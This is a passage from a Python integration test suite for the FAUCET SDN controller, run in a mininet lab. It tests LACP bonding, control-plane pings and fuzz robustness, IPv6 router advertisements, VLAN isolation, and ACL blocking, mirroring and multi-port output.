Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
    system priority: 65535
    system mac address: 0e:00:00:00:00:99
    port key: \d+
    port priority: 255
    port number: \d+
    port state: 63
details partner lacp pdu:
    system priority: 65535
    system mac address: 0e:00:00:00:00:01
    oper key: 1
    port priority: 1
    port number: %d
    port state: 62
Slave Interface: \S+-eth1
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
    system priority: 65535
    system mac address: 0e:00:00:00:00:99
    port key: \d+
    port priority: 255
    port number: \d+
    port state: 63
details partner lacp pdu:
    system priority: 65535
    system mac address: 0e:00:00:00:00:01
    oper key: 1
    port priority: 2
    port number: %d
    port state: 62
""".strip() % tuple(get_lacp_port_id(self.port_map['port_%u' % i]) for i in lag_ports)
        lacp_timeout = 5
        def prom_lacp_up_ports():
            # Count LAG member ports FAUCET reports as up (state 3).
            lacp_up_ports = 0
            for lacp_port in lag_ports:
                port_labels = self.port_labels(self.port_map['port_%u' % lacp_port])
                lacp_state = self.scrape_prometheus_var('port_lacp_state', port_labels, default=0)
                lacp_up_ports += 1 if lacp_state == 3 else 0
            return lacp_up_ports
        def require_lag_up_ports(expected_up_ports):
            # Poll until FAUCET reports the expected number of up LAG ports.
            for _ in range(lacp_timeout * 10):
                if prom_lacp_up_ports() == expected_up_ports:
                    break
                time.sleep(1)
            self.assertEqual(prom_lacp_up_ports(), expected_up_ports)
        def require_linux_bond_up():
            # Poll the Linux bonding state file until it matches the expected
            # synced state regex; save each snapshot for post-mortem.
            for _retries in range(lacp_timeout * 2):
                result = first_host.cmd('cat /proc/net/bonding/%s|sed "s/[ \t]*$//g"' % bond)
                result = '\n'.join([line.rstrip() for line in result.splitlines()])
                with open(os.path.join(self.tmpdir, 'bonding-state.txt'), 'w', encoding='utf-8') as state_file:
                    state_file.write(result)
                if re.search(synced_state_txt, result):
                    break
                time.sleep(1)
            self.assertTrue(
                re.search(synced_state_txt, result),
                msg='LACP did not synchronize: %s\n\nexpected:\n\n%s' % (
                    result, synced_state_txt))
        # Start with ports down.
        for port in lag_ports:
            self.set_port_down(self.port_map['port_%u' % port])
        require_lag_up_ports(0)
        orig_ip = first_host.IP()
        switch = self.first_switch()
        bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
        # Deconfigure bond members
        for bond_member in bond_members:
            self.quiet_commands(first_host, (
                'ip link set %s down' % bond_member,
                'ip address flush dev %s' % bond_member))
        # Configure bond interface
        self.quiet_commands(first_host, (
            ('ip link add %s address 0e:00:00:00:00:99 '
             'type bond mode 802.3ad lacp_rate fast miimon 100') % bond,
            'ip add add %s/24 dev %s' % (orig_ip, bond),
            'ip link set %s up' % bond))
        # Add bond members
        for bond_member in bond_members:
            self.quiet_commands(first_host, (
                'ip link set dev %s master %s' % (bond_member, bond),))
        for _flaps in range(2):
            # All ports down.
            for port in lag_ports:
                self.set_port_down(self.port_map['port_%u' % port])
            require_lag_up_ports(0)
            # Pick a random port to come up.
            up_port = random.choice(lag_ports)
            self.set_port_up(self.port_map['port_%u' % up_port])
            require_lag_up_ports(1)
            # We have connectivity with only one port.
            self.one_ipv4_ping(
                first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
            for port in lag_ports:
                self.set_port_up(self.port_map['port_%u' % port])
            # We have connectivity with two ports.
            require_lag_up_ports(2)
            require_linux_bond_up()
            self.one_ipv4_ping(
                first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
            # We have connectivity if that random port goes down.
            self.set_port_down(self.port_map['port_%u' % up_port])
            require_lag_up_ports(1)
            self.one_ipv4_ping(
                first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
            for port in lag_ports:
                self.set_port_up(self.port_map['port_%u' % port])
class FaucetUntaggedIPv4LACPMismatchTest(FaucetUntaggedIPv4LACPTest):
    """Ensure remote LACP system ID mismatch is logged."""
    def test_untagged(self):
        """Create one bond per link with differing system MACs; expect a mismatch log."""
        first_host = self.hosts_name_ordered()[0]
        orig_ip = first_host.IP()
        switch = self.first_switch()
        bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
        for i, bond_member in enumerate(bond_members):
            bond = 'bond%u' % i
            # NOTE(review): `i * 2 + i` (== 3*i) yields MAC byte 0x00 for i=0;
            # presumably just needs to differ per bond — confirm intent.
            self.quiet_commands(first_host, (
                'ip link set %s down' % bond_member,
                'ip address flush dev %s' % bond_member,
                ('ip link add %s address 0e:00:00:00:00:%2.2x '
                 'type bond mode 802.3ad lacp_rate fast miimon 100') % (bond, i * 2 + i),
                'ip add add %s/24 dev %s' % (orig_ip, bond),
                'ip link set %s up' % bond,
                'ip link set dev %s master %s' % (bond_member, bond)))
        self.wait_until_matching_lines_from_faucet_log_files(r'.+actor system mismatch.+')
class FaucetUntaggedIPv4ControlPlaneFuzzTest(FaucetUntaggedTest):
    """Fuzz the IPv4 control plane (VIP) and verify it keeps responding."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24"]
"""
    CONFIG = """
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    def test_ping_fragment_controller(self):
        """Oversized (fragmented) pings must not break controller pings."""
        first_host = self.hosts_name_ordered()[0]
        first_host.cmd('ping -s 1476 -c 3 %s' % self.FAUCET_VIPV4.ip)
        self.one_ipv4_controller_ping(first_host)
    def test_fuzz_controller(self):
        """Send fuzzed ICMP/ARP at the VIP; controller must still answer pings."""
        first_host = self.hosts_name_ordered()[0]
        self.one_ipv4_controller_ping(first_host)
        packets = 1000
        fuzz_template = 'python3 -c \"from scapy.all import * ; scapy.all.send(%s, count=%u)\"'
        # Fuzz ICMP echo reply (type 0), echo request (type 8), and ARP.
        for fuzz_cmd in (
                fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=0))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
                fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=8))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
                fuzz_template % ('fuzz(%s(pdst=\'%s\'))' % ('ARP', self.FAUCET_VIPV4.ip), packets)):
            fuzz_out = first_host.cmd(mininet_test_util.timeout_cmd(fuzz_cmd, 180))
            self.assertTrue(
                re.search('Sent %u packets' % packets, fuzz_out), msg='%s: %s' % (
                    fuzz_cmd, fuzz_out))
        self.one_ipv4_controller_ping(first_host)
    def test_flap_ping_controller(self):
        """Controller and host pings must survive repeated port flaps."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        for _ in range(5):
            self.one_ipv4_ping(first_host, second_host.IP())
            for host in first_host, second_host:
                self.one_ipv4_controller_ping(host)
            self.flap_all_switch_ports()
class FaucetUntaggedIPv4ControlPlaneTest(FaucetUntaggedTest):
    """Verify the IPv4 VIP answers fping at multiple payload sizes."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24"]
"""
    CONFIG = """
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    def test_fping_controller(self):
        """fping the VIP with default, 64 and 128 byte ICMP payloads."""
        first_host = self.hosts_name_ordered()[0]
        self.one_ipv4_controller_ping(first_host)
        # Try 64 byte icmp packets
        self.verify_controller_fping(first_host, self.FAUCET_VIPV4)
        # Try 128 byte icmp packets
        self.verify_controller_fping(first_host, self.FAUCET_VIPV4, size=128)
class FaucetUntaggedIPv6RATest(FaucetUntaggedTest):
    """Verify IPv6 router advertisement / neighbor discovery from FAUCET."""
    FAUCET_MAC = "0e:00:00:00:00:99"
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fe80::1:254/64", "fc00::1:254/112", "fc00::2:254/112", "10.0.0.254/24"]
        faucet_mac: "%s"
""" % FAUCET_MAC
    CONFIG = """
        advertise_interval: 5
""" + CONFIG_BOILER_UNTAGGED
    def test_ndisc6(self):
        """Neighbor solicitation for each VIP resolves to FAUCET's MAC."""
        first_host = self.hosts_name_ordered()[0]
        for vip in ('fe80::1:254', 'fc00::1:254', 'fc00::2:254'):
            self.assertEqual(
                self.FAUCET_MAC.upper(),
                first_host.cmd('ndisc6 -q %s %s' % (vip, first_host.defaultIntf())).strip())
    def test_rdisc6(self):
        """Router discovery reports both advertised /112 prefixes."""
        first_host = self.hosts_name_ordered()[0]
        rdisc6_results = sorted(list(set(first_host.cmd(
            'rdisc6 -q %s' % first_host.defaultIntf()).splitlines())))
        self.assertEqual(
            ['fc00::1:0/112', 'fc00::2:0/112'],
            rdisc6_results)
    def test_ra_advertise(self):
        """Unsolicited RAs (to all-nodes multicast) carry prefixes and source LLA option."""
        first_host = self.hosts_name_ordered()[0]
        tcpdump_filter = ' and '.join((
            'ether dst 33:33:00:00:00:01',
            'ether src %s' % self.FAUCET_MAC,
            'icmp6',
            'ip6[40] == 134',
            'ip6 host fe80::1:254'))
        tcpdump_txt = self.tcpdump_helper(
            first_host, tcpdump_filter, [], timeout=30, vflags='-vv', packets=1)
        for ra_required in (
                r'ethertype IPv6 \(0x86dd\), length 142',
                r'fe80::1:254 > ff02::1:.+ICMP6, router advertisement',
                r'fc00::1:0/112, Flags \[onlink, auto\]',
                r'fc00::2:0/112, Flags \[onlink, auto\]',
                r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
            self.assertTrue(
                re.search(ra_required, tcpdump_txt),
                msg='%s: %s' % (ra_required, tcpdump_txt))
    def test_rs_reply(self):
        """A router solicitation gets a unicast RA back to the soliciting host."""
        first_host = self.hosts_name_ordered()[0]
        tcpdump_filter = ' and '.join((
            'ether src %s' % self.FAUCET_MAC,
            'ether dst %s' % first_host.MAC(),
            'icmp6',
            'ip6[40] == 134',
            'ip6 host fe80::1:254'))
        tcpdump_txt = self.tcpdump_helper(
            first_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'rdisc6 -1 %s' % first_host.defaultIntf())],
            timeout=30, vflags='-vv', packets=1)
        for ra_required in (
                r'fe80::1:254 > fe80::.+ICMP6, router advertisement',
                r'fc00::1:0/112, Flags \[onlink, auto\]',
                r'fc00::2:0/112, Flags \[onlink, auto\]',
                r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
            self.assertTrue(
                re.search(ra_required, tcpdump_txt),
                msg='%s: %s (%s)' % (ra_required, tcpdump_txt, tcpdump_filter))
class FaucetUntaggedIPv6ControlPlaneFuzzTest(FaucetUntaggedTest):
    """Fuzz the IPv6 control plane (VIP) and verify it keeps responding."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fc00::1:254/112"]
"""
    CONFIG = """
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    def test_flap_ping_controller(self):
        """IPv6 controller and host pings must survive repeated port flaps."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
        for _ in range(5):
            self.one_ipv6_ping(first_host, 'fc00::1:2')
            for host in first_host, second_host:
                self.one_ipv6_controller_ping(host)
            self.flap_all_switch_ports()
    def test_fuzz_controller(self):
        """Send fuzzed packets of every scapy ICMPv6 class at the VIP."""
        first_host = self.hosts_name_ordered()[0]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.one_ipv6_controller_ping(first_host)
        fuzz_success = False
        packets = 1000
        count = 0
        abort = False
        def note(*args):
            # Timestamped-ish progress output for debugging slow runs.
            error('%s:' % self._test_name(), *args + tuple('\n'))
        # Some of these tests have been slowing down and timing out,
        # So this code is intended to allow some debugging and analysis
        for fuzz_class in dir(scapy.all):
            if fuzz_class.startswith('ICMPv6'):
                fuzz_cmd = ("from scapy.all import * ;"
                            "scapy.all.send(IPv6(dst='%s')/fuzz(%s()),count=%u)" %
                            (self.FAUCET_VIPV6.ip, fuzz_class, packets))
                out, start, too_long = '', time.time(), 30  # seconds
                popen = first_host.popen('python3', '-c', fuzz_cmd)
                for _, line in pmonitor({first_host: popen}):
                    out += line
                    # Abort the whole run if one class takes too long.
                    if time.time() - start > too_long:
                        note('stopping', fuzz_class, 'after >', too_long, 'seconds')
                        note('output was:', out)
                        popen.terminate()
                        abort = True
                        break
                popen.wait()
                if 'Sent %u packets' % packets in out:
                    count += packets
                    elapsed = time.time() - start
                    note('sent', packets, fuzz_class, 'packets in %.2fs' % elapsed)
                    fuzz_success = True
                if abort:
                    break
        note('successfully sent', count, 'packets')
        self.assertTrue(fuzz_success)
        # The VIP must still answer after fuzzing.
        note('pinging', first_host)
        self.one_ipv6_controller_ping(first_host)
        note('test_fuzz_controller() complete')
class FaucetUntaggedIPv6ControlPlaneTest(FaucetUntaggedTest):
    """Verify IPv6 control-plane reachability of the FAUCET VIP."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["fc00::1:254/112"]
"""

    CONFIG = """
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED

    def test_fping_controller(self):
        """fping the controller VIP with different ICMPv6 payload sizes."""
        first_host = self.hosts_name_ordered()[0]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.one_ipv6_controller_ping(first_host)
        # Try 64 byte icmp6 packets
        self.verify_controller_fping(first_host, self.FAUCET_VIPV6)
        # Try 128 byte icmp6 packets
        self.verify_controller_fping(first_host, self.FAUCET_VIPV6, size=128)
class FaucetTaggedAndUntaggedDiffVlanTest(FaucetTest):
    """Tagged and untagged hosts on different VLANs are mutually isolated."""

    N_TAGGED = 2
    N_UNTAGGED = 4
    LINKS_PER_HOST = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "tagged"
    101:
        description: "untagged"
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
            %(port_2)d:
                tagged_vlans: [100]
            %(port_3)d:
                native_vlan: 101
            %(port_4)d:
                native_vlan: 101
"""

    def setUp(self):
        """Build a topology with 2 tagged and 2 untagged hosts."""
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=2, n_untagged=2, links_per_host=self.LINKS_PER_HOST,
            hw_dpid=self.hw_dpid)
        self.start_net()

    def test_separate_untagged_tagged(self):
        """Hosts can ping within their VLAN but not across VLANs."""
        tagged_host_pair = self.hosts_name_ordered()[:2]
        untagged_host_pair = self.hosts_name_ordered()[2:]
        self.verify_vlan_flood_limited(
            tagged_host_pair[0], tagged_host_pair[1], untagged_host_pair[0])
        self.verify_vlan_flood_limited(
            untagged_host_pair[0], untagged_host_pair[1], tagged_host_pair[0])
        # hosts within VLANs can ping each other
        self.retry_net_ping(hosts=tagged_host_pair)
        self.retry_net_ping(hosts=untagged_host_pair)
        # hosts cannot ping hosts in other VLANs
        self.assertEqual(
            100, self.ping([tagged_host_pair[0], untagged_host_pair[0]]))
class FaucetUntaggedACLTest(FaucetUntaggedTest):
    """Port ACL: TCP 5001 blocked, TCP 5002 explicitly allowed."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_port5001_blocked(self):
        """TCP to port 5001 is dropped by the ingress ACL."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_blocked(5001, first_host, second_host)

    def test_port5002_notblocked(self):
        """TCP to port 5002 passes the ingress ACL."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedEgressACLTest(FaucetUntaggedTest):
    """VLAN egress ACL (acl_out): TCP 5001 blocked, 5002 allowed."""

    # Egress ACLs require OpenFlow metadata support in the dataplane.
    REQUIRES_METADATA = True
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        acl_out: 1
acls:
    1:
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_port5001_blocked(self):
        """TCP 5001 is dropped in the egress ACL table, before and after learning."""
        # Resolve the egress ACL table ID from Prometheus config export.
        egress_acl_table = self.scrape_prometheus_var(
            'faucet_config_table_names',
            labels={'table_name': 'egress_acl'}
        )
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_blocked(
            5001, first_host, second_host, table_id=egress_acl_table)
        self.ping_all_when_learned()
        self.verify_tp_dst_blocked(
            5001, first_host, second_host, table_id=egress_acl_table)

    def test_port5002_notblocked(self):
        """TCP 5002 passes the egress ACL table."""
        egress_acl_table = self.scrape_prometheus_var(
            'faucet_config_table_names',
            labels={'table_name': 'egress_acl'}
        )
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_notblocked(
            5002, first_host, second_host, table_id=egress_acl_table)
class FaucetUntaggedDPACLTest(FaucetUntaggedTest):
    """DP-wide ACL (dp_acls): TCP 5001 blocked, 5002 allowed on all ports."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        dp_acls: [1]
""" + CONFIG_BOILER_UNTAGGED

    def test_port5001_blocked(self):
        """TCP to port 5001 is dropped by the DP ACL."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_blocked(5001, first_host, second_host)

    def test_port5002_notblocked(self):
        """TCP to port 5002 passes the DP ACL."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedNoReconfACLTest(FaucetUntaggedTest):
    """With opstatus_reconf disabled, ACL flows persist across port down/up."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
                opstatus_reconf: False
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Drop rule for TCP 5001 stays installed while port_1 is down."""
        matches = {
            'in_port': int(self.port_map['port_1']),
            'tcp_dst': 5001,
            'eth_type': IPV4_ETH,
            'ip_proto': 6}
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_blocked(5001, first_host, second_host)
        # empty actions == drop rule present in the port ACL table.
        self.wait_until_matching_flow(
            matches, table_id=self._PORT_ACL_TABLE, actions=[])
        self.set_port_down(self.port_map['port_1'])
        # Rule must survive the port going down (no reconfiguration).
        self.wait_until_matching_flow(
            matches, table_id=self._PORT_ACL_TABLE, actions=[])
        self.set_port_up(self.port_map['port_1'])
        self.ping_all_when_learned()
        self.verify_tp_dst_blocked(5001, first_host, second_host)
        self.wait_until_matching_flow(
            matches, table_id=self._PORT_ACL_TABLE, actions=[])
class FaucetUntaggedACLTcpMaskTest(FaucetUntaggedACLTest):
    """ACL with a masked TCP destination port match (ports > 1023 blocked)."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            dl_type: 0x800
            ip_proto: 6
            # Match packets > 1023
            tcp_dst: 1024/1024
            actions:
                allow: 0
        - rule:
            actions:
                allow: 1
"""

    def test_port_gt1023_blocked(self):
        """Port 1024 (masked match) is blocked; port 1023 is not."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_blocked(1024, first_host, second_host, mask=1024)
        self.verify_tp_dst_notblocked(1023, first_host, second_host, table_id=None)
class FaucetUntaggedVLANACLTest(FaucetUntaggedTest):
    """VLAN-level ingress ACL (acl_in on the VLAN, not the port)."""

    CONFIG_GLOBAL = """
acls:
    1:
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            actions:
                allow: 1
vlans:
    100:
        description: "untagged"
        acl_in: 1
"""
    CONFIG = CONFIG_BOILER_UNTAGGED

    def test_port5001_blocked(self):
        """TCP 5001 is dropped in the VLAN ACL table."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_blocked(
            5001, first_host, second_host, table_id=self._VLAN_ACL_TABLE)

    def test_port5002_notblocked(self):
        """TCP 5002 passes the VLAN ACL table."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.verify_tp_dst_notblocked(
            5002, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
class FaucetUntaggedOutputOnlyTest(FaucetUntaggedTest):
    """An output_only port must never forward traffic into the switch."""

    CONFIG = """
        interfaces:
            %(port_1)d:
                output_only: True
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Input from the output_only port is dropped; other hosts still ping."""
        # Drop rule (empty actions) for any input on port_1.
        self.wait_until_matching_flow(
            {'in_port': int(self.port_map['port_1'])},
            table_id=self._VLAN_TABLE,
            actions=[])
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]
        # 100% loss from the output_only port; normal ports unaffected.
        self.assertEqual(100.0, self.ping((first_host, second_host)))
        self.assertEqual(0, self.ping((third_host, second_host)))
class FaucetUntaggedACLMirrorTest(FaucetUntaggedTest):
    """ACL mirror action copies traffic to a mirror port."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            actions:
                allow: 1
                mirror: %(port_3)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
                acl_in: 1
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Pings between hosts are mirrored to the mirror port."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
        self.verify_ping_mirrored(first_host, second_host, mirror_host)

    def test_eapol_mirrored(self):
        """EAPOL frames are also mirrored."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
        self.verify_eapol_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLOutputMirrorTest(FaucetUntaggedTest):
    """Mirroring implemented via the ACL output action (ports list)."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            actions:
                allow: 1
                output:
                    ports: [%(port_3)d]
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
                acl_in: 1
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Pings are copied to the output port as if mirrored."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedOrderedACLOutputMirrorTest(FaucetUntaggedTest):
    """Same as FaucetUntaggedACLOutputMirrorTest, using ordered output syntax."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            actions:
                allow: 1
                output:
                    - ports: [%(port_3)d]
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
                acl_in: 1
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Pings are copied to the output port as if mirrored."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
    """Mirror ACL without an explicit allow action (implicit allow).

    Inherits test methods from FaucetUntaggedACLMirrorTest.
    """

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            actions:
                mirror: %(port_3)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
                acl_in: 1
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
class FaucetMultiOutputTest(FaucetUntaggedTest):
    """ACL output to multiple ports, including one on a different VLAN."""

    CONFIG_GLOBAL = """
vlans:
    100:
    200:
acls:
    multi_out:
        - rule:
            actions:
                output:
                    ports: [%(port_2)d, %(port_3)d]
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: multi_out
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 200
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Traffic from port_1 is copied to ports 2 and 3, but not port 4."""
        first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
        tcpdump_filter = ('icmp')
        # second_host (listed output port) receives the ICMP request.
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        # third_host is on another VLAN; static ARP avoids needing resolution.
        tcpdump_txt = self.tcpdump_helper(
            third_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
        # fourth_host is not in the output list and must see nothing.
        tcpdump_txt = self.tcpdump_helper(
            fourth_host, tcpdump_filter, [
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
        self.assertFalse(re.search(
            '%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetMultiOrderedOutputTest(FaucetUntaggedTest):
    """Same as FaucetMultiOutputTest, using ordered output syntax."""

    CONFIG_GLOBAL = """
vlans:
    100:
    200:
acls:
    multi_out:
        - rule:
            actions:
                output:
                    - ports: [%(port_2)d, %(port_3)d]
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: multi_out
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 200
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Traffic from port_1 is copied to ports 2 and 3, but not port 4."""
        first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
        tcpdump_filter = ('icmp')
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        # third_host is on another VLAN; static ARP avoids needing resolution.
        tcpdump_txt = self.tcpdump_helper(
            third_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
        # fourth_host is not in the output list and must see nothing.
        tcpdump_txt = self.tcpdump_helper(
            fourth_host, tcpdump_filter, [
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
        self.assertFalse(re.search(
            '%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetUntaggedOutputTest(FaucetUntaggedTest):
    """ACL output action rewrites destination MAC and pushes a VLAN tag."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
